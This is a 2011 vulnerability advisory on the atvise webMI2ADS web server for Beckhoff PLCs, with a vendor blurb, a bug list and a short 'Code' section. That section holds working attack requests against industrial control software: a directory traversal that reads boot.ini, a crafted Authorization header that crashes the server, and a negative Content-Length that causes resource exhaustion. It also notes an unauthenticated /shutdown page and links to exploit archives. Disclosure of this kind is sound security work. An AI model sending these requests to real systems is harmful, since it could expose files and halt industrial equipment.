#######################################################################
Luigi Auriemma
Application: atvise webMI2ADS - Web server for Beckhoff PLCs
http://www.atvise.com/en/atvise-downloads/products
Versions: <= 1.0
Platforms: Windows XP embedded and CE x86/ARM
Bugs: A] directory traversal
B] NULL pointer
C] termination of the software
D] resources consumption
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"webMI2ADS is a very slim and compact web server with an ADS interface
(Beckhoff native PLC interface). It can be integrated on nearly any
ethernet based Beckhoff PLC and provides full data access including
automatic import of all PLC variables and types."
#######################################################################
=======
2) Bugs
=======
----------------------
A] directory traversal
----------------------
Classical directory traversal through the backslash delimiter which
allows to get the files located on the disk where is running the
server.
---------------
B] NULL pointer
---------------
NULL pointer dereference caused by the lacking of checks on the value
returned by strchr on the Authorization Basic HTTP field:
0043094F |> 6A 06 PUSH 6 ; /maxlen = 6
00430951 |. 68 7CAB4400 PUSH webMI2AD.0044AB7C ; |s2 = "Basic "
00430956 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00430959 |. 50 PUSH EAX ; |s1
0043095A |. FF15 10044400 CALL DWORD PTR DS:[<&MSVCR90._strnicmp>] ; \_strnicmp
...skip...
004309BC |. 6A 3A PUSH 3A ; /c = 3A (':')
004309BE |. 8D8D F8FEFFFF LEA ECX,DWORD PTR SS:[EBP-108] ; |
004309C4 |. 51 PUSH ECX ; |s
004309C5 |. FF15 FC034400 CALL DWORD PTR DS:[<&MSVCR90.strchr>] ; \strchr
004309CB |. 83C4 08 ADD ESP,8
004309CE |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
004309D1 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0
004309D5 |. 74 4B JE SHORT webMI2AD.00430A22
004309D7 |. 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
004309DA |. 2B55 FC SUB EDX,DWORD PTR SS:[EBP-4]
004309DD |. 83FA 40 CMP EDX,40
004309E0 |. 7D 40 JGE SHORT webMI2AD.00430A22
004309E2 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
004309E5 |. C600 00 MOV BYTE PTR DS:[EAX],0
------------------------------
C] termination of the software
------------------------------
For terminating the software remotely it's enough to go on the
/shutdown webpage.
------------------------
D] resources consumption
------------------------
Endless loop with memory consumption and CPU at 100% caused by a
particular negative Content-Length.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/mytoolz/mydown.zip
http://www.exploit-db.com/sploits/17963-1.zip
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17963-2.zip
A]
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
B]
udpsz -c "GET / HTTP/1.0\r\nAuthorization: Basic blah\r\n\r\n" -T -D SERVER 80 -1
D]
udpsz -c "POST / HTTP/1.0\r\nContent-Length: -30\r\n\r\n" -T -D SERVER 80 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################